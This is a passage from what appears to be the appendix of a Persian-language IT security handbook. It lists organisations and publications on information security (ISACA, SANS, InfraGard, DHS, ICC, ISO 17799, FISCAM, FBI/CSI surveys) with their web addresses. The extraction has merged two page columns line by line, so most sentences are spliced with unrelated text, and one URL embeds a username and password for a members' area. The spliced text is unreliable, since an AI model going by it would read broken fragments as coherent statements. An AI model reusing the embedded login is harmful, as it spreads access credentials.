‫ﺣﺎﻝﺣﺎﺿﺮ ﻭ ﺁﻳﻨﺪﺓ ﺍﻳﻦ ﺍﺗﺤﺎﺩﻳﻪ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫـﺪ‪ .‬ﺳـﺎﻝ ﻫـﺸﺘﻢ‬ ‫ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺘﺎﺑﻬﺎﻱ ﮔﻼﺳـﻨﺮ‪ ،٤٨٧‬ﻛﻠـﺮﻣﻦ‪ ٤٨٨‬ﻭ ﻣـﻚﻧـﻮﻳﻦ‪٤٨٩‬ﺭﺍ‬
‫)ﺳﺎﻝ ‪ (۲۰۰۳‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺟﻬﺎﻧﻲ‪:‬‬ ‫ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪:‬‬
‫‪http://ISACF:RESEARCH4@www.isaca.org/‬‬
‫‪@member/gcomm/gcv034.pdf‬‬ ‫‪Electronic Safety and Soundness: Securing‬‬
‫‪Finance in a New Age, Public Policy Issues‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﻭﻗﺎﻳﻊ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻥ‪ ،‬ﭼﻨﺪ ﺷـﺮﻛﺖ‬ ‫‪(October 2003).‬‬
‫ﻣﺸﺎﻭﺭ ﮔﺰﺍﺭﺷﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺭﺳﺎﻟﺔ ﻓﻮﻕ‪ ،‬ﻧﻬﺎﻳﺖ ﺗﻼﺷﻬﺎﻱ ﺳﻪ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺍﺳﺖ ﻛﻪ ﺑﺮ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﻬﻴﻪ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻧﻤﻮﻧـﻪ ﻣﺆﺳـﺴﻪ ﺍﺭﻧـﺴﺖ ﻭ‬
‫ﺍﺳﺎﺱ ﭼﻨﺪﻳﻦ ﻣﻘﺎﻟﻪ ﺑﻪ ﺭﺷﺘﺔ ﺗﺤﺮﻳﺮ ﺩﺭ ﺁﻣﺪﻩ‪.‬‬
‫ﻳﺎﻧﮓ‪ ٤٩٢‬ﺑﺘﺎﺯﮔﻲ ﺗﺤﻘﻴﻖ ﺳـﺎﻝ ‪ ۲۰۰۳‬ﺧـﻮﺩ ﺑـﺎ ﻋﻨـﻮﺍﻥ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪:‬‬ ‫‪Electronic Security: Risk Mitigation in‬‬
‫‪http://www.ey.com/global/download.nsf/US/T‬‬ ‫‪Financial Transactions (May 2002, June 2002,‬‬
‫‪SRS_Global_Information_Security_survey_2‬‬ ‫)‪July 2002‬‬
‫‪003/$file/TSRS_Global_Information_Securit‬‬
‫‪y_Survey_2003.pdf‬‬ ‫‪Electronic Finance: A New Approach to‬‬
‫)‪Financial Sector Development? (2002‬‬
‫ﺍﻃﻼﻋــﺎﺕ ﺍﻣﻨﻴﺘــﻲ ﺍﺯ ﺟﻤﻠــﻪ ﺩﺍﺩﻩﻫــﺎﻱ ﺗﺤﻘﻴﻘــﺎﺗﻲ ﻣﺮﺑــﻮﻁ ﺑــﻪ‬
‫‪Mobile Risk Management: E-Finance in the‬‬
‫ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﻭﺍﻛﻨﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻣﺆﺳـﺴﺔ‬ ‫)‪Wireless Environment (May 2002‬‬
‫‪ SANS‬ﭘﻴﺪﺍ ﻛﺮﺩ‪:‬‬
‫‪http://www.sans.org‬‬ ‫ﺍﻳﻦ ﻣﻘﺎﻻﺕ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﭘﺎﻳﮕـﺎﻩ‪ ،‬ﺭﻭﻱ‬
‫ﻭﺍﮊﺓ ‪ E-Security‬ﻛﻠﻴﻚ ﻛﻨﻴﺪ‪:‬‬
‫‪ InfraGard‬ﻣﺆﺳﺴﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺗﺤﻠﻴـﻞ‬ ‫‪www.worldbank1.org/finance‬‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺑﻪﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﻣﺆﺳـﺴﻪ ﭘﺮﻣﻨﻔﻌـﺖ ﺑـﺮﺍﻱ‬
‫ﻣﻄﺎﻟﺐ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﭘـﺮﻭﮊﻩ ﻫـﺎﻱ ﺗﺤﻘﻴﻘـﺎﺗﻲ ﻭ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺍﻋﻀﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺩﺍﻧﺶ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻌﻲ ﺍﺯ ﻫﻤﺎﻥ ﺍﻋﻀﺎ ﺭﺍ ﺩﺭ ﻫﻢ‬
‫ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻣﺆﺳﺴﺔ ﻧﻈﺎﺭﺕ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻲﺁﻣﻴﺰﺩ ﻭ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ InfraGard .‬ﺩﺭ ﺍﺑﺘﺪﺍﻳﻲﺗـﺮﻳﻦ ﺳـﻄﺢ‬ ‫‪٤٩٠‬‬
‫ﺍﻃﻼﻋﺎﺕ )‪ (ITGI‬ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪www.itgi.org :‬‬
‫ﺧﻮﺩ‪ ،‬ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﺸﺎﺭﻛﺘﻲ ﻣﻴﺎﻥ ﺩﻭﻟﺖ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ )ﻛـﻪ‬
‫ﺑﻮﺳﻴﻠﺔ ﺳﺎﺯﻣﺎﻥ ‪ FBI‬ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﺩ( ﻭ ﺍﺗﺤﺎﺩﻳﺔ ﺍﻧﺠﻤﻨﻬﺎﻱ ﺗﺠـﺎﺭﻱ‪،‬‬ ‫ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺑـﻪ ﺍﻧﺠﻤـﻦ ﺳﻴـﺴﺘﻢ‬
‫ﻣﺆﺳﺴﺎﺕ ﺩﺍﻧﺸﮕﺎﻫﻲ‪ ،‬ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ )ﻧﻴﺮﻭﻫـﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ( ﻭ‬ ‫ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻴﺰﻱ ﻭ ﻛﻨﺘﺮﻝ‪ ٤٩١‬ﺩﺭ ‪ www.isaca.org‬ﻣﺮﺍﺟﻌﻪ‬
‫ﺳﺎﻳﺮ ﻛـﺴﺎﻧﻲ ﺍﺳـﺖ ﻛـﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﻓـﺰﺍﻳﺶ ﺿـﺮﻳﺐ ﺍﻣﻨﻴـﺖ‬ ‫ﻛﻨﻴﺪ‪ .‬ﺍﻳـﻦ ﻣﻄﺎﻟﻌـﻪ ﺍﻱ ﻭﻳﮋﮔﻴﻬـﺎﻱ ﻛـﺸﻮﺭ ﺍﺭﻭﮔﻮﺋـﻪ ﺭﺍ ﻋﻨـﻮﺍﻥ‬
‫ﺯﻳﺮﺑﻨﺎﻫﺎﻱ ﺣﻴﺎﺗﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺎ ﺁﻧﻬـﺎ ﺍﺳـﺖ‪ .‬ﺑـﺮﺍﻱ ﻛـﺴﺐ‬ ‫ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺟﺎﻟﺐ ﺑﺎﺷﺪ‪:‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻃﻴﻒ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣﻄﺎﻟـﺐ ﺍﻣﻨﻴﺘـﻲ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ‬ ‫‪http://www.isaca.org/ct_case.htm‬‬
‫ﭘﺎﻳﮕﺎﻩ ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫‪http://www.infragard.net‬‬ ‫‪http://www.isaca.org/cobit.htm‬‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪) COBIT‬ﺑﻪ ﺁﺩﺭﺱ‬


‫ﻳﺎ ‪ (http://www.itgi.org‬ﻳـﻚ ﻣﺤـﺼﻮﻝ ﺁﺯﺍﺩ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕـﺮ ﻛـﻪ ﺭﻭﻱ ﻃﻴـﻒ ﮔـﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ ﺗﻬﺪﻳـﺪﺍﺕ‬
‫‪٤٩٣‬‬
‫ﺗﻤﺮﻛــﺰ ﺩﺍﺭﺩ‪ ،‬ﺩﭘﺎﺭﺗﻤــﺎﻥ ﺗــﺎﺯﻩﺗﺄﺳــﻴﺲ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ )‪(DHS‬‬
‫‪487 Glaessner‬‬
‫‪488 Kellerman‬‬
‫‪489 McNevin‬‬
‫‪492 Ernst & Young Institute‬‬ ‫‪490 IT Governance Institute‬‬
‫‪493 Department of Homeland Security‬‬ ‫‪491 Information Systems Audit and Control Association‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٧٠‬‬

‫ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﻣﺤﺮﻣـﺎﻧﮕﻲ ‪-‬‬ ‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺟﺪﻳﺪ‪ ،‬ﺣﻔﺎﻇـﺖ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﺑﺘﻮﺍﻧـﺪ ﻋﻤﻠﻜـﺮﺩ ﻣـﺆﺛﺮﻱ ﺩﺍﺷـﺘﻪ‬ ‫ﺍﺯ ﻣﻠﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺗﺮﻭﺭﻳﺴﺘﻲ ﺍﺳﺖ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺟﺰﺋﻲﺗـﺮ‬
‫ﺑﺎﺷﺪ ﻭ ﺑﻪ ﻧﻮﺁﻭﺭﻱ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﺩﻫﺪ ‪ -‬ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺟﺎﺳﻮﺳﻲ ﺭﺍ ﺗﺤﻠﻴﻞ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﺯ ﻣﺮﺯﻫـﺎ ﻭ‬
‫ﻓﺮﻭﺩﮔﺎﻫﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﻓﺎﻉ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﺯﻳﺮﺑﻨﺎﻫﺎﻱ ﺣﻴﺎﺗﻲ‬
‫ﭖ( ﻃﺮﺡ ﺗﺒﻴﻴﻦ ﺳﻴﺎﺳﺖ ‪ ICC‬ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ‪،‬‬ ‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺭﺍ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨـﺪ‪ ،‬ﻭ ﻭﺍﻛﻨـﺸﻬﺎﻱ‬
‫ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﻭ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ‪ -‬ﺍﻳﻦ ﻃﺮﺡ ﻣﻮﻗﻌﻴﺖ ‪ICC‬‬ ‫ﻛﺸﻮﺭ ﺭﺍ ﺑﺮﺍﻱ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺩﺭ ﺁﻳﻨـﺪﻩ ﻣـﺪﻭﻥ ﻣـﻲﺳـﺎﺯﻧﺪ‪.‬‬
‫ﺭﺍ ﺩﺭ ﻣﺴﺎﺋﻞ ﻛﻠﻴﺪﻱ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﻣﻨﺎﺑﻊﺍﻧﺴﺎﻧﻲ ﺭﻭﺷـﻦ‬ ‫‪ DHS‬ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺗﺄﺳﻴﺲ ﺍﺩﺍﺭﺍﺕ ﻣﺨﺘﻠﻒ‪ ،‬ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺗﻮﺻﻴﻪﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺍﻳـﻦ‬ ‫ﺍﺯ ﺣﻘـــﻮﻕ ﺷﻬــــﺮﻭﻧﺪﻱ ﺷــﻬﺮﻭﻧﺪﺍﻥ ﺁﻣـــﺮﻳﻜﺎﻳﻲ ﻭ ﺑﻬﺒــﻮﺩ‬
‫ﺯﻣﻴﻨﻪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪.‬‬ ‫ﺧـﺪﻣﺎﺕ ﻋﻤﻮﻣﻲ ﭼـﻮﻥ ﻛﻤـﻚﺭﺳﺎﻧﻲ ﻫﻨﮕﺎﻡ ﻭﻗــﻮﻉ ﺣـﻮﺍﺩﺙ‬
‫ﻃﺒﻴﻌﻲ ﻭ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺷﻬـﺮﻭﻧـﺪﻱ ﺭﺍ ﻧﻴﺰ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪ .‬ﺑـﺮﺍﻱ‬
‫ﺕ( ﻃﺮﺡ ﻣﻔﺎﻫﻴﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ - ٤٩٦‬ﻃﺮﺡ ﻣﻔـﺎﻫﻴﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺁﺩﺭﺱ‬
‫ﺳﺎﻝ ‪ ،۲۰۰۴‬ﺍﺑﺰﺍﺭ ﻗﺎﻧﻮﻧﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺿـﺎﺑﻄﺔ ﺧـﻮﺩ ﺁﻥ ﺩﺭ‬
‫‪ www.dhs.gov‬ﻣﺮﺍﺟﻌـﻪ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﻣـﺴﺘﻨﺪ ﺗﻮﺳـﻂ ﻳـﻚ‬
‫ﮔﺮﻭﻩ ﻃﺮﺡﺭﻳﺰ ﻏﻴﺮﺭﺳﻤﻲ ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻗﺎﻟﺐ ﻓﻌﻠـﻲ‪،‬‬ ‫ﺳــﺎﺯﻣﺎﻥ ‪ FBI‬ﺑﺘــﺎﺯﮔﻲ ﻧﺘــﺎﻳﺞ ﻳــﻚ ﺗﺤﻘﻴــﻖ ﺩﺭ ﻣــﻮﺭﺩ ﺟــﺮﺍﺋﻢ‬
‫ﻣﻔﺎﺩ ﻃﺮﺡ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮ ﺳﻪ ﺟﻨﺒﻪ ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧـﺪ‪:‬‬ ‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺍﺻـﻠﻲ‬
‫‪ (۱‬ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻗﺮﺍﺭﺩﺍﺩ؛ ‪ (۲‬ﻣﻼﺣﻈﺎﺕ ﻣﺤﺮﻣـﺎﻧﮕﻲ؛‬ ‫ﻣﺆﺳــﺴﻪ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﻪ ﺁﺩﺭﺱ ‪ www.gocsi.com‬ﻭ‬
‫ﻭ ‪ (۳‬ﺍﺭﺯﺵ ﻭﺍﻗﻌﻲ ﺍﻗﻼﻡ ﺩﺍﺩﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ .‬ﺍﻳـﻦ ﻣﻔـﺎﺩ ﺑـﻪ‬ ‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻖ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻄـﺮﺡ‬ ‫‪http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/F‬‬
‫ﻫﺴﺘﻨﺪ ﻣﺤﺪﻭﺩ ﻣﻲﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻟﺬﺍ ﺍﻳﻦ ﻃﺮﺡ ﺑﺎﻳﺪ ﺑﺎ ﺗﻔﺴﻴﺮﻱ ﺍﺯ‬ ‫‪BI2003.pdf‬‬
‫ﺿﻮﺍﺑﻂ ﺣﺎﻝ ﺣﺎﺿﺮ ﻭ ﻣﺮﺳﻮﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎ ﺗﻔﺴﻴﺮ ﺷﻮﺩ‪.‬‬
‫ﺩﻓﺘﺮ ﺗﺠﺎﺭﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ )‪ ٤٩٤(ICC‬ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺍﺳﺖ‬
‫‪ ٤٩٧FISCAM‬ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬ ‫ﻛﻪ ﺍﻋﻀﺎﻱ ﺁﻥ ﺷﺎﻣﻞ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻫﻢ ﻣﻲﺷـﻮﻧﺪ‪.‬‬
‫ﺯﻳﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪:‬‬ ‫ﻓﻌﺎﻟﻴﺖ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ‬
‫‪http://www.gao.gov/special.pubs/ai12.19.6.pdf‬‬ ‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺜﻞ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﻗـﻮﺍﻧﻴﻦ ﻣﺤﻴﻄﻬـﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬
‫ﻣﺆﺳﺴﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ )‪ (ISO‬ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫ﺍﺳﺖ‪ .‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ ICC‬ﻭ ﺻﻔﺤﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻳﻦ ﺑﺤﺚ ﺭﺍ ﻣﻲ‪-‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺟﻬـﺎﻧﻲ ﺗـﺪﻭﻳﻦ ﻣـﻲﻛﻨـﺪ‪ .‬ﻣﺠﻤﻮﻋـﺔ ﺍﻟﮕﻮﻫـﺎﻱ‬ ‫ﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪:‬‬
‫ﺳﺮﺁﻣﺪﻱ ﺍﻳـﻦ ﻣﺆﺳـﺴﻪ ﺩﺭ ﺣـﻮﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ‬ ‫‪http://www.iccwbo.org/home/menu_electroni‬‬
‫)‪ ،(ISO/IEC17799‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺆﺳﺴﻪ ﺍﺳﺘﺎﻧﺪﺍﺭ ﻛﺸﻮﺭ ﺍﻧﮕﻠـﺴﺘﺎﻥ‬ ‫‪c_business.asp‬‬
‫)‪ (BS 7799‬ﺭﺍ ﺗﻜﻤﻴﻞ ﻛﺮﺩﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻣﻮﺭﺩ ﻗﺒـﻮﻝ ﻭﺍﻗـﻊ ﺷـﺪﻩ ﻭ ﺍﻧﺘﻈـﺎﺭ ﺁﻥ‬ ‫ﻣﻄﺎﻟﺐ ﺯﻳﺮ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﺧﻴﺮ ‪ ICC‬ﻫﺴﺘﻨﺪ‪:‬‬
‫ﻣﻲﺭﻭﺩ ﻛﻪ ﺑﻪ ﻳـﻚ ﺳـﻨﺪ ﻣﺮﺟـﻊ ﺩﺭ ﺗﻬﻴـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺑﻬﻴﻨـﺔ‬
‫ﺍﻟﻒ( ﺁﻳﻴﻦﻧﺎﻣﺔ ﺍﻣﻀﺎﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،٤٩٥‬ﻛﻪ ﻧﺘﻴﺠـﺔ ﺑﺮﺭﺳـﻲ ﻭ‬
‫ﺗﻀﻤﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﻤﻦ ﻭ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺗﺒـﺪﻳﻞ ﺷـﻮﺩ‪.‬‬
‫ﭘﺎﺳﺦ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎﻳﻲ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻞﻫـﺎﻱ‬
‫ﺑﺮﺍﻱ ﺁﮔـﺎﻫﻲ ﺑﻴـﺸﺘﺮ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺯﻳـﺮ ﻧﮕـﺎﻫﻲ‬
‫ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺩﺭ ﺳـﭙﺘﺎﻣﺒﺮ ﺳـﺎﻝ ‪ ۲۰۰۳‬ﺗـﺴﻠﻴﻢ‬
‫ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪:‬‬
‫ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎﻳﻲ ﺷﺪﻩ ﺑﻮﺩ‪.‬‬
‫‪http://www.iso.org‬‬

‫ﺏ( ﻃﺮﺡ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﻣﺤﺮﻣﺎﻧﮕﻲ ‪ -‬ﺍﻳﻦ ﻃﺮﺡ ﺍﻫﺪﺍﻑ ﺑﻠﻨﺪﭘﺮﻭﺍﺯﺍﻧﺔ‬


‫‪ ICC‬ﺭﺍ ﺑﺮﺍﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻛﺮﺩﻥ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺷـﺮﺡ‬

‫‪496 E-Temrs Draft‬‬ ‫‪494 International Chamber of Commerce‬‬


‫‪497 Federal Information System Control Manual‬‬ ‫‪495 Digital Signatures Directive‬‬
‫‪٤٧١‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﻧﻤﻮﻧﺔ ﺑﺴﻴﺎﺭ ﺧﻮﺑﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻫﺪﺍﻑ ﺩﻭﻟﺖ ﺟﻬـﺖ ﺗﻨﻈـﻴﻢ‬ ‫‪(۳‬‬ ‫ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻛﻪ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺑﻬﻴﻨـﺔ‬
